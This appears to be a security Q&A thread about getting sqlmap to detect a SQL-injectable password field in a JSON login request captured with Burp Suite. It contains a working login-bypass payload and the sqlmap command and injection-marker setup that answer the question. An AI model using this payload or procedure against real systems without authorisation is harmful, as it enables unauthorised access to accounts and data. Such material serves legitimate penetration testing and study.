Hi I'm trying to do a SQL injection in a login form.
With BurpSuite I intercept the request:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username”:"user",”password”:"pass"}
using:
sqlmap -u requestFile
(where requestFile is the content of the request intercepted with Burp)
sqlmap can't find the injectable field that is password.
I'm sure that's it's injectable cause if as password I input:
' OR 1=1; -- -
I can login with every username I insert
Tried also with:
{"username”:*,”password”:*}
but no luck.
What I'm doing wrong?
Example:
POST / HTTP/1.1
Host: www.example.com
{"username":"*", "password":"*"}
Saved as sqlrequest.txt
Can then initiate a test using this command:
py sqlmap.py -r sqlrequest.txt --level=5 risk=3 --force-ssl
You should then receive a prompt that a custom injection marker is found and that JSON data found in POST body. Process both and then you are good to go.
Sources:
https://security.stackexchange.com/a/150506/67046
https://security.stackexchange.com/a/51862/67046
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With